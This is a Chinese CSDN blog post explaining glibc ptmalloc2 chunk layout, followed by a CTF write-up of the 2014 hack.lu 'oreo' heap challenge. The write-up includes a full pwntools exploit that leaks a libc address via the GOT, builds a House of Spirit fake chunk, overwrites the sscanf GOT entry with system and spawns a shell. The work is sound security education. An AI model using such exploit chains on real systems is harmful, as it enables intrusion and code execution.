【堆知识】chunk结构和堆相关的pwn学习(2014 hack.lu oreo)

原创 已于 2023-08-19 22:23:30 修改 · 466 阅读 · 1 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#学习
于 2023-08-14 01:26:11 首次发布
本文详细介绍了C语言中malloc分配的堆结构,特别是ptmalloc2中的chunk组织,包括分配和未分配堆的区别。并结合CTF挑战,讨论了如何利用这些知识进行内存溢出攻击和ret2libc技巧。

堆的结构来说还是有着一定的学习难度的,所以写此作为记录
首先分享一下学习的博客:
https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/introduction/

https://www.jianshu.com/p/2f1c3d2ca5c5

堆的结构

这里的结构主要是指ptmalloc2中的堆的结构,主要针对c语言中malloc出来的堆的情况。

在这种前提下的堆的结构分为两种:一种是使用着(分配着)的堆,一种是未分配的堆

这里利用一下CTF-Wiki的结构

  • 分配着的堆
chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |             Size of previous chunk, if unallocated (P clear)  |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |             Size of chunk, in bytes                     |A|M|P|
  mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |             User data starts here...                          .
        .                                                               .
        .             (malloc_usable_size() bytes)                      .
next    .                                                               |
chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |             (size of chunk, but used for application data)    |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |             Size of next chunk, in bytes                |A|0|1|
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  • 未分配的堆
chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |             Size of previous chunk, if unallocated (P clear)  |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
`head:' |             Size of chunk, in bytes                     |A|0|P|
  mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |             Forward pointer to next chunk in list             |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |             Back pointer to previous chunk in list            |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |             Unused space (may be 0 bytes long)                .
        .                                                               .
 next   .                                                               |
chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
`foot:' |             Size of chunk, in bytes                           |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        |             Size of next chunk, in bytes                |A|0|0|
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

还是可以很清晰地看出结构来的。

重点注意:

  • 我们一般使用malloc函数的时候,是不计算堆的头部的,也就是pre_sizesize字段,例如你malloc了0x10的堆,但是实际上的size字段是加上了头部字段以后的字段,当然也还要考虑PREV_INUSE是否为1
    例如,64位系统中malloc(0x30)后,堆的结构应该是
0x602000:   0x0000000000000000  0x0000000000000041 <=== chunk1
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
......
0x6020c0:   0x0000000000000000  0x0000000000020f41 <=== top chunk
  • PREV_INUSE字段是1代表前一个字段是被使用着的,同时第一个被创建的堆中PREV_INUSE字段也是1

注意:在利用堆的free相关的题目的时候,尤其是用到了House of Spirit类似的题目的时候注意:构造的时候也要注意构造next-chunk的第一个字段,因为在构造的堆被free了之后,它就会检查下一个堆的第一个字段,看是否和堆大小保持一致。

其他参数画图理解了:
在这里插入图片描述

CTF例题

2014 hack.lu oreo

在ida中打开文件看看
在这里插入图片描述
发现是很典型的那种记录数据的系统题,我们来看看add函数
在这里插入图片描述
desp有25个字节,name有27个字节
发现存在堆溢出
然后也可以猜出这个应该是一个结构体,大概长这样:

struct xxx{
	char *des;	//0 ~ 24
	char* name; // 25 ~ 51
	char* pre_ptr; // 52 ~ 55
}

然后注意看show函数
在这里插入图片描述
发现这个show的顺序好像是和添加的次序反的(虽然没啥关系),但是它既然可以printf,那就代表有可能可以把got表中的地址给打印出来

payload1 = b'a'*27+p32(elf.got['puts'])

add(b'a'*25,payload1)
show_rifle()

这里有打印后的样子,就是不知道为什么会是在descrption后面(虽然可以想到是description的字符串没有\0结束符,但是name不可以直接开始读字符串吗?)
在这里插入图片描述
打印出puts的地址后,我们用ret2libc的思路,用LibcSearcher就可以直接进行其他函数的查找了,包括system和/bin/sh字符串

接下来是最关键的,我们要构造一个chunk,我们从这个record函数里面可以看出来
在这里插入图片描述
这是一个全局可写地址,我们可以用这个函数来写入chunk,要注意的是,我们构造chunk的时候要注意chunk头的值,然后最需要注意的是:
在这里插入图片描述
也就是说我们添加msg的时候那个chunk的布局是这样的:
在这里插入图片描述
同时要注意,要关注下一个chunk的pre_size的大小,要和现在的chunk的大小对应,所以要在后面写上0x40

while num < 0x3f:
    add(b'a'*25,b'a'*27)
    num += 1

payload2 = b'a'*27+p32(0x0804a2a8)	#msg的地址
add(b'a'*25,payload2)

payload3 = b'\x00'*0x20+p32(0x40)+p32(0x60)	
message(payload3)

我们通过修改这个指针,将它变成got表地址
在这里插入图片描述
变成
在这里插入图片描述

add(p32(sscanf_got),'a')
message(p32(system_addr))

这里是exp:

from pwn import *
from LibcSearcher import *
import warnings
warnings.filterwarnings("ignore")

p = process('./oreo')
elf = ELF("./oreo")

# context.log_level = 'debug'

def add(descrip, name):
    p.sendline('1')
    p.sendline(name)
    p.sendline(descrip)

def show_rifle():
    p.sendline('2')
    p.recvuntil('===================================\n')

def order():
    p.sendline('3')

def message(notice):
    p.sendline('4')
    p.sendline(notice)

payload1 = b'a'*27+p32(elf.got['puts'])

add(b'a'*25,payload1)
show_rifle()
p.recvuntil('===================================\n')
p.recvuntil('Description: ')
puts_addr = u32(p.recv()[:4])
print((puts_addr))
# log.success('puts_addr: '+hex(puts_addr))

libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
print('system_addr: '+hex(system_addr))
print('binsh_addr: '+hex(binsh_addr))

num = 1
while num < 0x3f:
    add(b'a'*25,b'a'*27)
    num += 1

payload2 = b'a'*27+p32(0x0804a2a8)	#msg的地址
add(b'a'*25,payload2)

payload3 = b'\x00'*0x20+p32(0x40)+p32(0x60)	
message(payload3)

order()
# p.recvuntil('Okay order submitted!\n')

sscanf_got = elf.got['__isoc99_sscanf']
add(p32(sscanf_got),'a')

message(p32(system_addr))

p.sendline('/bin/sh\0')

p.interactive()
ethanyi9
关注
PWN · heap | House Of Spirit】2014_hack.lu_oreo
Mr_Fmnwon的博客
02-05 1077
chunk劫持到指定位置,能够大有作为,而House Of Spirit的目的就是这一点。最初了解仅是了解,通过本题,对于利用手法的利用,感悟更为深入。House of Spirit 是中的一种技术。该技术的核心在于在目标位置处伪造 fastbin chunk,并将其释放,从而达到分配指定地址的 chunk 的目的。要想构造 fastbin fake chunk,并且将其释放时,可以将其放入到对应的 fastbin 链表中,需要绕过一些必要的检测,即。
CTFHub技能树---pwn-Chunk Extend
saulgoodman的博客
02-07 718
add这里如果 index 0 ~ 9 都申请了的 chunk ,那么 i = 10 再退出 for 循环,但是还会接下去利用 ptr[10] = malloc(ptr[20]) 申请chunk,实现 index 0 的块溢出。最后第11个chunk的size会变成非常大,编辑chunk0,就可以实现溢出。也就是add 可以覆盖掉一个第一个 chunk 的 size。
PWN_glibc管理机制及内存结构(入门篇)
weixin_57140753的博客
12-25 602
CTF利用基础
linux内存管理
sy4331的博客
11-16 3267
内存的使用在linux开发过程中非常普遍,我们有必要了解相关的内存管理方便我们对内存问题的理解定位。 内存结构层次 linux内存管理分为三个层次,分别为分配区area、heap内存块chunk。 area:内存最上层即为分配区area。分配区area分为主分配区(main area)线程分配区(thread area)。 主进程空间对应的分配区即为主分配区main area,每个进程仅有一个主分配区,对应我们通常所说的bss段上面空间位置。 线程空间对应的分配区即为线程分配区
利用—Chunk extend Overlapping
2201_75735270的博客
08-19 347
overlapping在中是一种比较常见的利用手段,其主要原理就是因为某些意外情况我们可以去修改一些已经申请或在空闲状态的块的大小,从而造成块重叠的情况,而这也就引发了一系列安全隐患。本文涉及相关实验:[高级栈溢出技术—ROP实战](https://www.hetianlab.com/cour.do?wemedia)(ROP的全称为Return-oriented。
pwn 基础
qq_41696518的博客
09-03 1183
是用malloc函数申请使用的。假设我们通过void * ptr = malloc(0x10);系统会调用一些函数在内存中开辟一大片空间作为的分配使用空间。malloc函数再从这篇的分配使用空间中分配0x10大小的空间,将指向该空间的地址返回给ptr(余下的空间称之为topthunk)chunk:用户申请内存的单位,也是管理器管理内存的基本单位 malloc()返回的指针指向一个chunk的数据区域。
[PWN] 学习记录——
LDX的博客
11-06 663
pwn 部分的学习心得记录
CTF-PWN--【chunk extend/overlapping-2】(hack.lu ctf 2015 bookstore)
llovewuzhengzi的博客
02-07 1378
功能选择前就已经先创建三个大小为0x80的了(对于chunk的size为0x90),第一个chunk是order1的内容,第二个chunk是order2的内容,第三个chunk是dest的内容(这个存储字符串的),然后根据输入对应其功能函数,对应功能5的函数会创建一个0x140的(对于chunk的size为0x150),然后把之前函数定义的两个order的内容组合再加一个Your order is submitted!发现有个格式化字符串漏洞,但是在循环外,也就必须submit后才会执行该函数。
house_of_spirit && 2014_hack.lu_oreo例题分析
Pwnpanda的博客
08-13 1454
2014_hack.lu_oreo 相关知识点: Fastbin Attack – House of Spirit 相关链接: 2014_hack.lu_oreo下载 CTF Wiki Fastbin Attack IDA创建结构体 题目分析: 先分析功能: ①添加枪支(add),这个地方会读取枪支的名字描述,这是第一个难点,这个里面存在一个结构(差点被坑死在这,为...
PWN - chunk 介绍以及源码剖析
最新发布
m0_57836225的博客
11-19 1133
PWN 技术的深入探索中,第 18 节聚焦于 chunk 相关知识,包括其基本概念、结构以及对其源码的剖析。这部分内容对于理解内存管理机制以及挖掘利用相关漏洞至关重要。
pwn学习笔记(7)--相关源码
qq_66013948的博客
04-04 1081
​ 对于用户来说,只需要确保malloc()函数返回的内存不会发生溢出,并且在不用的时候使用free() 函数将其释放,以后也不再做任何操作即可。而对于glibc来说’它要在用户第一次调用malloc()函数之前对进行初始化;在用户频繁申请释放时维护结构’保证时间空间上的效率;同时还要检测过程中可能产生的错误,并及时终止程序。​ 首先,先稍微说下几个相关的宏定义。
2014 hack.lu oreo
coco的博客
11-25 576
程序分析 这是一个经典的菜单程序 checksec add函数 建立了一个rifle结构体。 struct rifle { description //从0字节开始 name //从25字节开始 pre_rifle_ptr //从52字节开始 } //总共56字节 并且注意到descriptionname都能读入56个字节,也就是说pre_rifle_ptr是能被完全控制的。 并且有一...
linux 溢出学习之malloc管理机制原理详解
热门推荐
jmp esp
03-02 1万+
前言在pwn学习过程中,最为难啃的骨头莫过于相关的利用,然而无论是在实际情况下还是在ctf比赛中,利用都是绝对的主流,是漏洞的主要类型之一。鉴于国内相关资料有限,系统讲解溢出利用的更是少之又少,我在此整理相关内容,既能作为自己学习的记录,也希望能够给大家带来一定的作用,不过鉴于本人也在学习之中,如有错误希望大家包涵,并且能够积极指正。的基础知识什么是是一种全局的数据结构,用以动态管理系
2022catf1ag pwn-chunk
weixin_51480590的博客
12-10 350
2022catf1ag pwn-chunk wp
【逆向学习记录】分配中chunk&bins
卦星的专栏
03-23 3767
1 概述 学习的过程中,开始的时候,有个很难理解的东西,那个东西就是malloc,涉及到malloc就会涉及到chunk,实话说chunk这个东西的学习,确实经历了不少时间,总结一下,防止忘记 参考 Linux内存管理深入分析-上这篇文章详细将来chunk的进化过程,这里就不在深入查看了,深入浅出,是学习溢出基础的佳作 Linux内存管理深入分析-下这篇文章详细讲了bin的结构,并且被我大...
Heap块Chunk
分不清东西南北的Laffey
11-29 4804
&amp;块0x01 基础知识——Chunk0x02 基础知识——Heap0x03 的基本操作0x04 相关的函数1&gt;malloc2&gt;free0x05 溢出0x06 溢出中比较重要的几个步骤·寻找分配函数realloc malloc calloc·寻找危险函数·确定填充长度0x07 Fast bin0x08 Unsort bin注意点Fastbin attack--blin...
、malloc_chunk
qq_41661777的博客
08-14 652
• 在程序运行过程中,可以提供动态内存的分配,允许程序申请大小未知的内存。 • 其实就是在程序虚拟地址空间的一块连续的线性区域,它由低地址向高地址生长。 • 我们一般称管理的那部分程序为管理器。 • 管理器位于用户程序内核中间,主要负责 : • malloc • free • double free : 当p已经被释放后再次释放,造成乱七八糟的现象。 • 请求 • 响应用户的申请内存请求,向操作系统申请内存,然后返回给用户程序。为了保持内存管理的高效性,内核一般会预先分配很大的一块连续的
Pwn基础知识笔记
3569
12-15 4908
http://www.jianshu.com/p/6e528b33e37a pwntools简单语法 作为最好用的pwn工具,简单记一下用法: 连接:本地process()、远程remote( , );对于remote函数可以接url并且指定端口 数据处理:主要是对整数进行打包:p32、p64是打包为二进制,u32、u64是解包为二进制 IO模块:这个比较容易跟zio搞混,记住zio是re
Pwn-Overflow Free Chunk(溢出)
CharlesGodX的博客
03-22 1456
0x00:前言 这次介绍一种栈溢出类似名字的溢出攻击,首先借用应用CTF-Wiki上的例子理解一下溢出。 0x01:漏洞介绍 溢出是指程序向某个块中写入的字节数超过了块本身可使用的字节数(之所以是可使用而不是用户申请的字节数,是因为管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),因而导致了数据溢出,并覆盖到物理相邻的高地址的下一个块,我们用两...
pwn入门
qq_35066257的博客
04-10 2763
在程序执行的过程中,由malloc申请的内存空间被称作chunk,而当程序申请的chunk被free时会被加入到相应的空闲管理列表(bin)中。 Chunk结构: 解释: pre_size: 前一个chunk块的大小,如果chunk_size的P位为1则pre_size无效,上个chunk可以使用pre_size的空间。(前一个chunk块的大小,指的是低地址的chunkchunk_size...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值